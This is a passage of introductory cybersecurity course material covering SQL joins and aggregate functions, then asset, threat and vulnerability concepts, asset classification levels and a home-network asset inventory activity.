described in the Lab features section to open a full-screen view of the Bash shell, where you can
re-enter the query.
How many rows did the inner join return?
Task 2. Return more data
You now must return the information on all machines and the employees who have
machines. Next, you must do the reverse and retrieve the information of all employees and
any machines that are assigned to them.
To achieve this, you’ll complete a left join and a right join on
the employees and machines tables. The results will include all records from one or the
other table. You must link these tables using the common device_id column.
1. Run the following SQL query to connect the machines and employees tables through a left
join. You must replace the keyword X in the query:
SELECT *
FROM machines
X JOIN employees ON machines.device_id = employees.device_id;
Note: In a left join, all records from the table referenced after FROM and before LEFT JOIN are
included in the result. In this case, all records from the machines table are included, regardless of
whether they are assigned to an employee or not.
What is the value in the username column for the last record returned?
cgriffin
NULL
areyes
asundara
2. Run the following SQL query to connect the machines and employees tables through a right
join. You must replace the keyword X in the query to solve the problem:
SELECT *
FROM machines
X JOIN employees ON machines.device_id = employees.device_id;
Note: In a right join, all records from the table referenced after RIGHT JOIN are included in the
result. In this case, all records from the employees table are included, regardless of whether they
have a machine or not.
Task 3. Retrieve login attempt data
To continue investigating the security incident, you must retrieve the information on all
employees who have made login attempts. To achieve this, you’ll perform an inner join on
the employees and log_in_attempts tables, linking them on the common username column.
Run the following SQL query to perform an inner join on
the employees and log_in_attempts tables. Replace X with the name of the right table. Then
replace Y and Z with the name of the column that connects the two tables:
SELECT *
FROM employees
INNER JOIN X ON Y = Z;
Note: You must specify the table name with the column name (table.column) when joining the
tables.
How many records are returned by this inner join?
Continuous learning in SQL
You've explored a lot about SQL, including applying filters to SQL queries and joining multiple tables
together in a query. There's still more that you can do with SQL. This reading will explore an example of
something new you can add to your SQL toolbox: aggregate functions. You'll then focus on how you can
continue learning about this and other SQL topics on your own.
Aggregate functions
In SQL, aggregate functions are functions that perform a calculation over multiple data points and return
the result of the calculation. The actual data is not returned.
There are various aggregate functions that perform different calculations:
● COUNT returns a single number that represents the number of rows returned from your query.
● AVG returns a single number that represents the average of the numerical data in a column.
● SUM returns a single number that represents the sum of the numerical data in a column.
Aggregate function syntax
To use an aggregate function, place the keyword for it after the SELECT keyword, and then in
parentheses, indicate the column you want to perform the calculation on.
For example, when working with the customers table, you can use aggregate functions to summarize
important information about the table. If you want to find out how many customers there are in total,
you can use the COUNT function on any column, and SQL will return the total number of records,
excluding NULL values. You can run this query and explore its output:
SELECT COUNT(firstname)
FROM customers;
The result is a table with one column titled COUNT(firstname) and one row that indicates the count.
If you want to find the number of customers from a specific country, you can add a filter to your query:
SELECT COUNT(firstname)
FROM customers
WHERE country = 'USA';
With this filter, the count is lower because it only includes the records where the country column
contains a value of 'USA'.
There are a lot of other aggregate functions in SQL. The syntax of placing them after SELECT is exactly
the same as the COUNT function.
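Both COUNT queries, including the behavior of skipping NULL values, can be verified with a short sqlite3 sketch. The four-row customers table below is hypothetical and includes one NULL firstname to show the exclusion:

```python
import sqlite3

# Hypothetical four-row customers table, including one NULL firstname.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE customers (firstname TEXT, country TEXT)")
conn.executemany("INSERT INTO customers VALUES (?, ?)",
                 [("Mark", "USA"), ("Jennifer", "USA"),
                  ("Luís", "Brazil"), (None, "USA")])

# COUNT(column) skips NULL values, so the NULL firstname is not counted.
total = conn.execute("SELECT COUNT(firstname) FROM customers").fetchone()[0]
usa = conn.execute(
    "SELECT COUNT(firstname) FROM customers WHERE country = 'USA'"
).fetchone()[0]
assert (total, usa) == (3, 2)
```

There are four rows, but the unfiltered count is 3 because NULL values are excluded, and the filtered count is 2 because only two USA rows have a non-NULL firstname.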
Continuing to learn SQL
SQL is a widely used querying language, with many more keywords and applications. You can continue
to learn more about aggregate functions and other aspects of using SQL on your own.
Most importantly, approach new tasks with curiosity and a willingness to find new ways to apply SQL to
your work as a security analyst. Identify the data results that you need and try to use SQL to obtain these
results.
Fortunately, SQL is one of the most important tools for working with databases and analyzing data, so
you'll find a lot of support in trying to learn SQL online. First, try searching for the concepts you've
already learned and practiced to find resources that have accurate, easy-to-follow explanations. When
you identify these resources, you can use them to extend your knowledge.
Continuing your practical experience with SQL is also important. You can also search for new databases
that allow you to perform SQL queries using what you've learned.
Key takeaways
Aggregate functions like COUNT, SUM, and AVG allow you to work with SQL in new ways. There are many
other additional aspects of SQL that could be useful to you as an analyst. By continuing to explore SQL on
your own, you can expand the ways you can apply SQL in a cybersecurity context.
Reference guide: SQL
The SQL reference guide contains keywords for SQL queries. Security analysts can use these keywords
to query databases and find data to support security-related decisions. The reference guide is divided
into four different categories of SQL keywords for security-related tasks:
● Query a database
● Apply filters to SQL queries
● Join tables
● Perform calculations
Within each category, commands are organized alphabetically.
Access and save the guide
You can save a copy of this guide for future reference. You can use it as a resource for additional practice
or in your future professional projects.
To access a downloadable version of this course item, click the following link and select Use Template.
Reference guide: SQL
Glossary terms from module 4
Terms and definitions from Course 4, Module 4
Database: An organized collection of information or data
Date and time data: Data representing a date and/or time
Exclusive operator: An operator that does not include the value of comparison
Filtering: Selecting data that match a certain condition
Foreign key: A column in a table that is a primary key in another table
Inclusive operator: An operator that includes the value of comparison
Log: A record of events that occur within an organization's systems
Numeric data: Data consisting of numbers
Operator: A symbol or keyword that represents an operation
Primary key: A column where every row has a unique entry
Query: A request for data from a database table or a combination of tables
Relational database: A structured database containing tables that are related to each other
String data: Data consisting of an ordered sequence of characters
SQL (Structured Query Language): A programming language used to create, interact with, and request
information from a database
Syntax: The rules that determine what is correctly structured in a computing language
Wildcard: A special character that can be substituted with any other character
Course 5 – Assets, Threats, and Vulnerabilities
What do you picture when you think about the security field? This might make you think of a dark
room with people hunched over their computers. Maybe you picture a person in a lab
carefully analyzing evidence. Or, maybe you imagine a guard standing watch in front of a building.
The truth is, no matter what thoughts cross your mind, all of these examples are part of the wide
world of security. Hi, my name is Da'Queshia. I have worked as a security engineer for four years.
I'm excited to be your instructor for this course and share some of my experience with you. At
Google, I'm part of a diverse team of security professionals who all have different backgrounds and
unique perspectives. For example, in my role, I work to secure Gmail. Part of my daily activities
include developing new security features and fixing vulnerabilities in the application to make email
safer for our users. Some members of my team began working in
security after graduating from college. Many others found their way into the field
after years of working in another industry. Security teams come in all different shapes and sizes.
Each member of a team has a role to play. While our specific functions within the group differ, we
all share the same objective: protecting valuable assets from harm. Accomplishing this mission
involves a combination of people, processes, and tools. In this course, you'll learn about each of
these in detail. First, you'll be introduced to the world of asset security. You'll learn about the
variety of assets that organizations protect and how these factor into a company's overall approach
to security. Then, you'll begin exploring the security systems and controls that teams use to
proactively protect people and their information. All systems have weaknesses that can be
improved upon. When those weaknesses are neglected or ignored, they can lead to serious
problems. In this section of the course, you'll focus on common vulnerabilities in systems and the
ways security teams stay ahead of potential problems. Finally, you'll learn about the threats to asset
security. You'll also be introduced to the threat modeling process that security teams use to stay
one step ahead of potential attacks. In this field, we try to do everything possible to avoid being put
in a compromised position. By the end of this course, you'll have a clearer picture of the ways
people, processes, and technology work together
to protect all that's important. Throughout the course, you'll also get an idea of the exciting
career opportunities available to you. Security truly is an interdisciplinary field. Your background
and perspective are assets. Whether you're a recent college graduate or starting a new career path,
the security field presents a wide range of possibilities.
Course 5 overview
Hello, and welcome to Assets, Threats, and Vulnerabilities, the fifth course in the Google Cybersecurity
Certificate. You’re on an exciting journey!
By the end of this course, you’ll build an understanding of the wide range of assets organizations must
protect. You’ll explore many of the most common security controls used to protect valuable assets from
risk. You’ll also discover the variety of ways assets are vulnerable to threats by adopting an attacker
mindset.
Certificate program progress
The Google Cybersecurity Certificate program has eight courses. Assets, Threats, and Vulnerabilities is
the fifth course.
1. Foundations of Cybersecurity — Explore the cybersecurity profession, including significant
events that led to the development of the cybersecurity field and its continued importance to
organizational operations. Learn about entry-level cybersecurity roles and responsibilities.
2. Play It Safe: Manage Security Risks — Identify how cybersecurity professionals use frameworks
and controls to protect business operations, and explore common cybersecurity tools.
3. Connect and Protect: Networks and Network Security — Gain an understanding of network-level
vulnerabilities and how to secure networks.
4. Tools of the Trade: Linux and SQL — Explore foundational computing skills, including
communicating with the Linux operating system through the command line and querying
databases with SQL.
5. Assets, Threats, and Vulnerabilities — (current course) Learn about the importance of security
controls and developing a threat actor mindset to protect and defend an organization’s assets
from various threats, risks, and vulnerabilities.
6. Sound the Alarm: Detection and Response — Understand the incident response lifecycle and
practice using tools to detect and respond to cybersecurity incidents.
7. Automate Cybersecurity Tasks with Python — Explore the Python programming language and
write code to automate cybersecurity tasks.
8. Put It to Work: Prepare for Cybersecurity Jobs — Learn about incident classification, escalation,
and ways to communicate with stakeholders. This course closes out the program with tips on
how to engage with the cybersecurity community and prepare for your job search.
Course 5 content
Each course of this certificate program is broken into modules. You can complete courses at your own
pace, but the module breakdowns are designed to help you finish the entire Google Cybersecurity
Certificate in about six months.
What’s to come? Here’s a quick overview of the skills you’ll learn in each module of this course.
Module 1: Introduction to asset security
You will be introduced to how organizations determine what assets to protect. You'll learn about the
connection between managing risk and classifying assets by exploring the unique challenge of securing
physical and digital assets. You'll also be introduced to the National Institute of Standards and
Technology (NIST) framework standards, guidelines, and best practices for managing cybersecurity risk.
Module 2: Protect organizational assets
You will focus on security controls that protect organizational assets. You'll explore how privacy impacts
asset security and understand the role that encryption plays in maintaining the privacy of digital assets.
You'll also explore how authentication and authorization systems help verify a user’s identity.
Module 3: Vulnerabilities in systems
You will build an understanding of the vulnerability management process. You'll learn about common
vulnerabilities and develop an attacker mindset by examining the ways vulnerabilities can become
threats to asset security if they are exploited.
Module 4: Threats to asset security
Finally, you will explore common types of threats to digital asset security. You'll also examine the tools
and techniques used by cybercriminals to target assets. In addition, you'll be introduced to the threat
modeling process and learn ways security professionals stay ahead of security breaches.
Hi. My name is Da'Queshia. I'm a security engineer. That basically means I work securing Google's
products so users like you aren't vulnerable. Before I entered cybersecurity, I worked installing
Internet. I also worked at a chip factory. I worked in fast food. I sold shoes at the mall. I did a lot of
things before I made it here. A lot of what I learned in my past jobs I actually use every day. Some of
it is my soft skills like time management, people skills, and communication. As a new cybersecurity
analyst, it's important to be able to communicate, take feedback, and feel uncomfortable, not with
the people around you, but with the problems you're trying to solve because sometimes it requires
you to think outside of the box and be challenged. I would describe my job as a Google security
guard because I work on the Gmail security team; it's my job to protect Gmail. Some of those threats
come from attackers sending you bad emails, trying to get your user credentials or get you to click on a
phishing link. When it comes to vulnerabilities, some of those could be something like unsanitized
input, which can lead to trouble. My typical work day starts like everyone else. I check my emails
and then from there I go into my bug queue; it's essentially when people tell me there's a problem
with one of our products. I start doing a little bit of research and then I like to explore the bug a
little bit more. I like to figure out if this can break this, can it also break this, and if it can, what else
can I do with it? Then from there, I look for a solution to make sure that I fix that hole and then any
other holes that we might have in our security. One of the things you learned about in this course
is threat modeling, and that's something I use every day. Whenever I get a bug, it's part of my job to
figure out the attack tree and what types of vectors could be used to take advantage of vulnerabilities. No
one is born knowing everything. I know that sounds really cliche or like super obvious, but it helps
me because it puts into perspective the time and effort that everyone must put in in order to
learn something new. So be patient with yourself. Don't let anyone discourage you from
cybersecurity. Taking this course is one step closer to reaching your goal. Don't get discouraged
now. Keep going.
We all depend on technology so much nowadays. Examples of this are all around us. Personal
devices, like smartphones, help keep us in touch with friends and families across the globe.
Wearable technologies help us achieve personal goals and be more productive. Businesses have
also come to embrace technology in everyday life. From streamlining operations to
automating processes, our world is more connected because of technology. The more we rely on
technology, the more information we share. As a result, an enormous amount
of data is created every day. This huge surge in data creation presents unique challenges. As
businesses become more reliant on technology, cybercriminals become more sophisticated
in how they affect organizations. Data breaches are becoming increasingly serious due to all the
sensitive data businesses are storing. One positive aspect of these challenges is a growing need for
individuals like you! Security is a team effort. Unique perspectives, like yours, are an asset to any
organization. A team filled with diverse backgrounds, cultures, and experiences is more likely to
solve problems and be innovative. As breach after breach hits the headlines, it's clear that
organizations need more professionals focused on security. Companies around the globe are
working hard to keep up with the demands of a rapidly changing digital landscape. As the
environment continues to transform, your personal experience becomes even more valuable. In this section,
we'll start by exploring how assets, threats, and vulnerabilities factor into security plans. After that,
we'll discuss the use of asset inventories in protecting the wide range of assets that companies
have. Then, we'll consider the challenges in this rapidly changing digital world. And finally, you'll
gain an understanding of the building blocks of a security plan: its policies, standards, and
procedures. We'll examine the NIST Cybersecurity Framework that companies use to create
security plans that protect their customers and their brands.
Painting a portrait. Perfecting a new basketball move. Playing a solo on guitar.
They all share something in common. Can you guess what it is? If you thought "practice,"
you're absolutely correct! It takes time, dedication, and focus to improve these skills. The security
profession is no different. Planning for the future is a core skill that you'll need to practice all the
time in security. We all deal with uncertainty by trying to solve problems before they arise. For
example, if you're going on a trip, you might think about the length of the trip and how much to
pack. Maybe you're traveling somewhere cold. You might bring coats and sweaters to help keep you
warm. We all want to feel the security of knowing that there's a plan if something goes wrong.
Businesses are no different. Just like you, organizations try their best to plan ahead by analyzing
risk. Security teams help companies by focusing on risk. In security, a risk is anything that can
impact the confidentiality, integrity, or availability of an asset. Our primary focus as security
practitioners is to maintain confidentiality, integrity, and availability, which are the three
components of the CIA triad. The process of security risk planning is the first step toward
protecting these cornerstones. Each organization has their own unique security plan based on the
risk they face. Thankfully, you don't need to be familiar with every possible security plan to be a
good security practitioner. All you really need to know are the basics of how these plans are put
together. Security plans are based on the analysis of three elements: assets, threats, and
vulnerabilities. Organizations measure security risk by analyzing how each can have an effect on
confidentiality, integrity, and availability of their information and systems. Basically, they each
represent the what, why, and how of security. Let's spend a little time exploring each of these in
more detail. As you might imagine, an asset is an item perceived as having value to an organization.
This often includes a wide range of things. Buildings, equipment, data, and people are all examples of
assets that businesses want to protect. Let's examine this idea more by analyzing the assets of a
home. Inside a home, there's a wide range of assets, like people and personal belongings. The
outside structure of a home is made of assets too, like the walls, roof, windows, and doors. All these
assets have value, but they differ in how they might be protected. Someone might place a lower
priority on protecting the outside walls than on the front door, for example. This is because a
burglar is more likely to enter through the front door than a wall. That's why we have locks. With so
many types of assets to think of, security plans need to prioritize resources. After all, no matter how
large a security team is, it would be impossible to monitor every single asset at all hours of the day.
Security teams can prioritize their efforts based on threats. In security, a threat is any circumstance
or event that can negatively impact assets. Much like assets, threats include a wide range of things.
Going back to the example of a home, a threat can be a burglar who's trying to gain access. Burglars
aren't the only type of threat that affect the security of windows and doors. What if either broke by
accident? Strong winds can blow the door open during a bad storm. Or kids playing with a ball
nearby can accidentally damage a window.
The final element of a security plan that we're going to cover is vulnerabilities. In security, a
vulnerability is a weakness that can be exploited by a threat. A weak lock on a front door, for
example, is a vulnerability that can be exploited by a burglar. And old, cracked wood is a different
vulnerability on that same front door that can increase the chances of storm damage. In other
words, think of vulnerabilities as flaws within an asset. Assets can have many different types of
vulnerabilities that make them easy targets for attackers. We'll explore different types of threats and
vulnerabilities in greater detail later. For now, just understand that security teams need to account
for a wide range of assets, threats, and vulnerabilities to effectively plan for the future.
Understand risks, threats, and vulnerabilities
When security events occur, you’ll need to work in close coordination with others to address the
problem. Doing so quickly requires clear communication between you and your team to get the job
done.
Previously, you learned about three foundational security terms:
● Risk: Anything that can impact the confidentiality, integrity, or availability of an asset
● Threat: Any circumstance or event that can negatively impact assets
● Vulnerability: A weakness that can be exploited by a threat
These words tend to be used interchangeably in everyday life. But in security, they are used to describe
very specific concepts when responding to and planning for security events. In this reading, you’ll
identify what each term represents and how they are related.
Security risk
Security plans are all about how an organization defines risk. However, this definition can vary widely
by organization. As you may recall, a risk is anything that can impact the confidentiality, integrity, or
availability of an asset. Since organizations have particular assets that they value, they tend to differ in
how they interpret and approach risk.
One way to interpret risk is to consider the potential effects that negative events can have on a business.
Another way to present this idea is with this calculation:
Likelihood x Impact = Risk
For example, you risk being late when you drive a car to work. This negative event is more likely to
happen if you get a flat tire along the way. And the impact could be serious, like losing your job. All these
factors influence how you approach commuting to work every day. The same is true for how businesses
handle security risks.
In general, we calculate risk in this field to help:
● Prevent costly and disruptive events
● Identify improvements that can be made to systems and processes
● Determine which risks can be tolerated
● Prioritize the critical assets that require attention
The business impact of a negative event will always depend on the asset and the situation. Your primary
focus as a security professional will be to focus on the likelihood side of the equation by dealing with
certain factors that increase the odds of a problem.
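The Likelihood x Impact calculation described above can be sketched in code. This is a minimal illustration only, not part of the certificate materials; the asset names and the 1-to-5 rating scales below are hypothetical assumptions.

```python
# Minimal sketch of the "Likelihood x Impact = Risk" calculation.
# The assets and their 1-5 ratings are hypothetical examples.

def risk_score(likelihood: int, impact: int) -> int:
    """Risk = Likelihood x Impact, each rated on a 1-5 scale."""
    return likelihood * impact

# Hypothetical assets with estimated likelihood and impact ratings
assets = {
    "customer database": (2, 5),  # unlikely event, but very high impact
    "public website":    (4, 3),  # frequently probed, moderate impact
    "office printer":    (3, 1),  # common issues, low impact
}

# Prioritize the critical assets that require attention (highest risk first)
ranked = sorted(assets.items(), key=lambda kv: risk_score(*kv[1]), reverse=True)
for name, (likelihood, impact) in ranked:
    print(f"{name}: risk = {risk_score(likelihood, impact)}")
```

Running this prints the assets in descending risk order, mirroring how a security team might use the calculation to decide where to focus first.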
Risk factors
As you’ll discover throughout this course, there are two broad risk factors that you’ll be concerned with
in the field:
● Threats
● Vulnerabilities
The risk of an asset being harmed or damaged depends greatly on whether a threat takes advantage of
vulnerabilities.
Let’s apply this to the risk of being late to work. A threat would be a nail puncturing your tire, since tires
are vulnerable to running over sharp objects. In terms of security planning, you would want to reduce
the likelihood of this risk by driving on a clean road.
Categories of threat
Threats are circumstances or events that can negatively impact assets. There are many different types of
threats. However, they are commonly categorized as two types: intentional and unintentional.
For example, an intentional threat might be a malicious hacker who gains access to sensitive information
by targeting a misconfigured application. An unintentional threat might be an employee who holds the
door open for an unknown person and grants them access to a restricted area. Either one can cause an
event that must be responded to.
Categories of vulnerability
Vulnerabilities are weaknesses that can be exploited by threats. There’s a wide range of vulnerabilities,
but they can be grouped into two categories: technical and human.
For example, a technical vulnerability can be misconfigured software that might give an unauthorized
person access to important data. A human vulnerability can be a forgetful employee who loses their
access card in a parking lot. Either one can lead to risk.
Key takeaways
Risks, threats, and vulnerabilities have very specific meanings in security. Knowing the relationship
between them can help you build a strong foundation as you grow essential skills and knowledge as a
security analyst. This can help you gain credibility in the industry by demonstrating that you have
working knowledge of the field. And it signals to your future colleagues that you’re a member of the
global security community.
Security starts with Asset Classification
It can be stressful when you have trouble finding something important. You're late to an
appointment and can't find your keys! We all find ourselves in situations like these at one time or
another. Believe it or not, organizations deal with the same kind of trouble. Take a few seconds to
think of the number of important assets you have nearby. I'm thinking of my phone, wallet, and
keys, for example. Next, imagine that you've just joined a security team for a small online retailer.
The company has been growing over the past few years, adding more and more customers. As a
result, they're expanding their security department to protect the increasing numbers of assets they
have. Let's say each of you are responsible for 10 assets. That's a lot of assets! Even in this small
business setting, that's an incredible amount of things that need protecting. A fundamental truth of
security is you can only protect the things you account for. Asset management is the process of
tracking assets and the risks that affect them. All security plans revolve around asset management.
Recall that assets include any item perceived as having value to an organization. Equipment, data,
and intellectual property are just a few of the wide range of assets businesses want to protect. A
critical part of every organization's security plan is keeping track of its assets. Asset management
starts with having an asset inventory, a catalog of assets that need to be protected. This is a central
part of protecting organizational assets. Without this record, organizations run the risk of losing
track of all that's important to them. A good way to think of asset inventories is as a
shepherd protecting sheep. Having an accurate count of the number of sheep helps in a lot of ways.
For example, it will be easier to allocate resources, like food, to take care of them. Another benefit of
an asset inventory might be that you'd get an alert if one of them goes missing. Once more, think of the
important assets you have nearby. Just like me, you're probably able to rate them according to the
level of importance. I would rank my wallet ahead of my shoes, for example. In security, this
practice is known as asset classification. In general, asset classification is the practice of labeling
assets based on their sensitivity and importance to an organization. Organizations label assets
differently. Many of them follow a basic classification scheme: public, internal-only, confidential, and
restricted. Public assets can be shared with anyone. Internal-only can be shared with anyone in the
organization but should not be shared outside of it. And confidential assets should only be accessed
by those working on a specific project. Assets classified as restricted are typically highly sensitive
and must be protected. Assets with this label are considered need-to-know. Examples include
intellectual property and health or payment information. For example, a growing online retailer
might mark internal emails about a new product as confidential because those working on the new
product should know about it. They might also label the doors at their offices with the restricted
sign to keep everyone out who doesn't have a specific reason to be in there. These are just a couple
of everyday examples that you may be familiar with from your prior experience. For the most part,
classification determines whether an asset can be disclosed, altered, or destroyed. Asset management
is a continuous process, one that helps uncover unexpected gaps in security and potential risks.
Keeping track of all that's important to an organization is an essential part of security planning.
Common classification requirements
Asset management is the process of tracking assets and the risks that affect them. The idea behind this
process is simple: you can only protect what you know you have.
Previously, you learned that identifying, tracking, and classifying assets are all important parts of asset
management. In this reading, you’ll learn more about the purpose and benefits of asset classification,
including common classification levels.
Why asset management matters
Keeping assets safe requires a workable system that helps businesses operate smoothly. Setting these
systems up requires having detailed knowledge of the assets in an environment. For example, a bank
needs to have money available each day to serve its customers. Equipment, devices, and processes need
to be in place to ensure that money is available and secure from unauthorized access.
Organizations protect a variety of different assets. Some examples might include:
● Digital assets such as customer data or financial records.
● Information systems that process data, like networks or software.
● Physical assets which can include facilities, equipment, or supplies.
● Intangible assets such as brand reputation or intellectual property.
Regardless of its type, every asset should be classified and accounted for. As you may recall, asset
classification is the practice of labeling assets based on sensitivity and importance to an organization.
Determining each of those two factors varies, but the sensitivity and importance of an asset typically
requires knowing the following:
● What you have
● Where it is
● Who owns it, and
● How important it is
An organization that classifies its assets does so based on these characteristics. Doing so helps them
determine the sensitivity and value of an asset.
Common asset classifications
Asset classification helps organizations implement an effective risk management strategy. It also helps
them prioritize security resources, reduce IT costs, and stay in compliance with legal regulations.
The most common classification scheme is: restricted, confidential, internal-only, and public.
● Restricted is the highest level. This category is reserved for incredibly sensitive assets, like need-to-know information.
● Confidential refers to assets whose disclosure may lead to a significant negative impact on an organization.
● Internal-only describes assets that are available to employees and business partners.
● Public is the lowest level of classification. These assets have no negative consequences to the organization if they’re released.
How this scheme is applied depends greatly on the characteristics of an asset. It might surprise you to
learn that identifying an asset’s owner is sometimes the most complicated characteristic to determine.
Note: Although many organizations adopt this classification scheme, there can be variability at the
highest levels. For example, government organizations label their most sensitive assets as confidential
instead of restricted.
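The four-level scheme above could be modeled as an ordered enumeration, which makes "is this level at least confidential?" checks straightforward. This is an illustrative sketch under stated assumptions; the enum and the sample policy function are inventions for this example, not part of the certificate materials.

```python
from enum import IntEnum

# The four common classification levels, ordered from lowest to highest
# sensitivity. Using IntEnum lets us compare levels directly.
class Classification(IntEnum):
    PUBLIC = 1         # no negative consequences if released
    INTERNAL_ONLY = 2  # available to employees and business partners
    CONFIDENTIAL = 3   # disclosure may significantly harm the organization
    RESTRICTED = 4     # highest level; need-to-know information

def requires_extra_protection(level: Classification) -> bool:
    """Hypothetical policy: confidential assets and above get extra safeguards."""
    return level >= Classification.CONFIDENTIAL

print(requires_extra_protection(Classification.RESTRICTED))     # True
print(requires_extra_protection(Classification.INTERNAL_ONLY))  # False
```

Because the levels are ordered, the same comparison logic would also accommodate a variant scheme, such as a government organization whose highest label is confidential.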
Challenges of classifying information
Identifying the owner of certain assets is straightforward, like the owner of a building. Other types of
assets can be trickier to identify. This is especially true when it comes to information.
For example, a business might issue a laptop to one of its employees to allow them to work remotely.
You might assume the business is the asset owner in this situation. But, what if the employee uses the
laptop for personal matters, like storing their photos?
Ownership is just one characteristic that makes classifying information a challenge. Another concern is
that information can have multiple classification values at the same time. For example, consider a letter
addressed to you in the mail. The letter contains some public information that’s okay to share, like your
name. It also contains fairly confidential pieces of information that you’d rather only be available to
certain people, like your address. You’ll learn more about how these challenges are addressed as you
continue through the program.
Key takeaways
Every business is different. Each business will have specific requirements to address when devising
their security strategy. Knowing why and how businesses classify their assets is an important skill to
have as a security professional. Information is one of the most important assets in the world. As a
cybersecurity professional, you will be closely involved with protecting information from damage,
disclosure, and misuse. Recognizing the challenges that businesses face classifying this type of asset is a
key to helping them solve their security needs.
Activity Overview
In this activity, you will classify assets connected to a home office network.
Asset management is a critical part of every organization's security plan. Remember that asset
management is the process of tracking assets and the risks that affect them. Effective asset management
starts with creating an asset inventory, or a catalog of assets that need to be protected. Then, it involves
classifying assets based on their level of importance and sensitivity to risk.
Be sure to complete this activity before moving on. The next course item will provide you with a
completed exemplar to compare to your own work.
Scenario
Review the following scenario. Then, complete the step-by-step instructions.
One of the most valuable assets in the world today is information. Most information is accessed over a
network. There tend to be a variety of devices connected to a network and each is a potential entry point
to other assets.
An inventory of network devices can be a useful asset management tool. An inventory can highlight
sensitive assets that require extra protection.
You’re operating a small business from your home and must create an inventory of your network
devices. This will help you determine which ones contain sensitive information that requires extra
protection.
To do this, you will start by identifying three devices that have access to your home network. This might
include devices such as:
● Desktop or laptop computers
● Smartphones
● Smart home devices
● Game consoles
● Storage devices or servers
● Video streaming devices
Then, you’ll list important characteristics of each device such as its owner, location, and type. Finally,
you will assign each device a level of sensitivity based on how important it is to protect.
Link to template: Home asset inventory
Step 2: Identify assets
In the asset inventory spreadsheet, find the Asset column header. Consider the devices that may be
connected to the home network. Examine devices in the scenario graphic to help you brainstorm.
Choose three devices that are not already listed in the spreadsheet and add them to the empty rows in
the Asset column.
Note: A few devices, like a network router, desktop, and a guest smartphone have already been added
for your reference.
Step 3: Fill in the characteristics of each asset
List important characteristics, including Network access, Owner, and Location for each asset that you’ve
identified.
Here’s an explanation of each characteristic:
● Network access describes how often the device is connected to the network.
● Owner describes the person responsible for the device.
● Location describes where the device is located in relation to the router.
Step 4: Evaluate the access of network devices
Review the information that you’ve listed in the Network access, Owner, and Location columns.
In the Notes column, record 1 or 2 details or characteristics of each device. Do this by asking yourself
questions about each:
● What kind of information is stored on the device?
● How does it connect to the network?
● Is the owner careful about securing it?
For example, the desktop computer contains sensitive information, like photos, that only the owner
should have access to. In contrast, the network router uses one frequency for smart home devices and
another for all other devices.
Note: Keep in mind that there might be some variation within each category. Try to identify details that
could impact the confidentiality, integrity, or availability of information that’s connected to the network.
Step 5: Classify the sensitivity of network devices
It’s time to classify assets based on the information you’ve collected. Do this by thinking about how an
asset could impact your business if its security was compromised:
● What types of information would be disclosed or stolen?
● Could an attacker alter information on the device?
● What would happen to the business if this information were destroyed?
For example, the network router is classified as confidential because the owner has granted limited
access to the device to specific users.
Find the Sensitivity column in the asset inventory. Type one of the four levels of sensitivity you
previously learned about.
Note: You can use the Categories table as a guide for choosing an appropriate classification.
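The inventory built in the steps above could be sketched as a simple data structure, one record per row of the template's columns (Asset, Network access, Owner, Location, Notes, Sensitivity). The devices, owners, and classifications below are hypothetical examples, not the contents of the exemplar.

```python
# A minimal home asset inventory mirroring the template's columns.
# All entries are hypothetical examples.
inventory = [
    {"asset": "Network router", "network_access": "Continuous",
     "owner": "Internet service provider", "location": "Living room",
     "notes": "Uses separate frequencies for smart home devices",
     "sensitivity": "confidential"},
    {"asset": "Desktop computer", "network_access": "Occasional",
     "owner": "Homeowner", "location": "Home office",
     "notes": "Stores photos and financial records",
     "sensitivity": "restricted"},
    {"asset": "Guest smartphone", "network_access": "Occasional",
     "owner": "Guest", "location": "Varies",
     "notes": "Connects over Wi-Fi; owner's security habits unknown",
     "sensitivity": "internal-only"},
]

# Surface the most sensitive devices, which need extra protection
sensitive = [d["asset"] for d in inventory
             if d["sensitivity"] in ("restricted", "confidential")]
print(sensitive)  # ['Network router', 'Desktop computer']
```

Filtering by sensitivity like this illustrates the point of the activity: once assets are cataloged and classified, deciding where to apply extra safeguards becomes a simple query.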
Pro Tip: Save the template
Finally, be sure to save a blank copy of the template you used to complete this activity. You can use it for
further practice or in your professional projects. These templates will help you work through your
thought processes and demonstrate your experience to potential employers.
What to Include in Your Response
Be sure to include the following elements in your completed activity:
● List of 3 devices on the home network
● List network access, owner, and location for each device
● 1–2 notes on network access
● A sensitivity classification
Activity Exemplar: Classify the assets connected to a home network
Here is a completed exemplar along with an explanation of how the exemplar fulfills the
expectations for the activity.
Link to exemplar: Home asset inventory exemplar
Assessment of Exemplar
Compare the exemplar to your completed asset inventory. Review your work using each of
the criteria in the exemplar. What did you do well? Where can you improve? Use your
answers to these questions to guide you as you continue to progress through the course.
Note: The exemplar represents one possible way to complete the activity. Yours will likely
differ in certain ways. What’s important is that your asset inventory lists the common
characteristics of network connected devices and evaluates them based on their level of
sensitivity.
The exemplar uses detail from the given scenario and adheres to the following guidelines:
● Identify 3 devices on the home network
● List network access, owner, and location details for each device
● Include 1–2 notes on network access
● Classify each asset based on level of sensitivity
The exemplar only lists devices with network access because that fits within the scope of
this scenario. However, asset inventories might include non-network devices. For example,
a homeowner might also keep track of physical assets like a safe or digital assets like family
videos.
Classifying assets based on their level of importance can be subjective. Much of asset
classification depends on identifying an asset's owner, its location, and other important
characteristics. This information should be evaluated before determining who should have
access to an asset and what they are authorized to do. Remember, classification helps
determine the level of impact an asset can have on a business if it were disclosed, altered,
or destroyed.
Key Takeaways
Having an inventory of devices on your home network is a useful way to protect your
personal assets. It’s also a useful artifact that you can show to prospective employers when
interviewing for security analyst positions. Resources like this demonstrate your security
mindset and ability to think critically about asset vulnerabilities.
Assets in a Digital World
Welcome back! We've covered a lot of information so far. I hope you're having as much fun
exploring the role of security as I am! We've explored what
organizational assets are and why they need protection. You've also gotten a sense of the
tremendous amount of assets security teams protect. Previously, we began examining security
asset management and the importance of keeping track of everything that's important
to an organization. Security teams classify assets based on value. Next, let's expand our security
mindset and think about this question. What exactly is valuable about an asset? These days, the
answer is often information. Most information is in a digital form. We call this data. Data is
information that is translated, processed, or stored by a computer. We live in a connected world.
Billions of devices around the world are linked to the internet and are exchanging data with each
other all the time. In fact, millions of pieces of data are being passed to your device right now! When
compared to physical assets, digital assets have additional challenges. What you need to understand
is that protecting data depends on where that data is and what it's doing. Security teams protect
data in three different states: in use, in transit, and at rest. Let's investigate this idea in greater
detail. Data in use is data being accessed by one or more users. Imagine being at a park with your
laptop. It's a nice sunny day, and you stop at a bench to check your email. This is an example of data
in use. As soon as you log in, your inbox is considered to be in use. Next, is data in transit. Data in
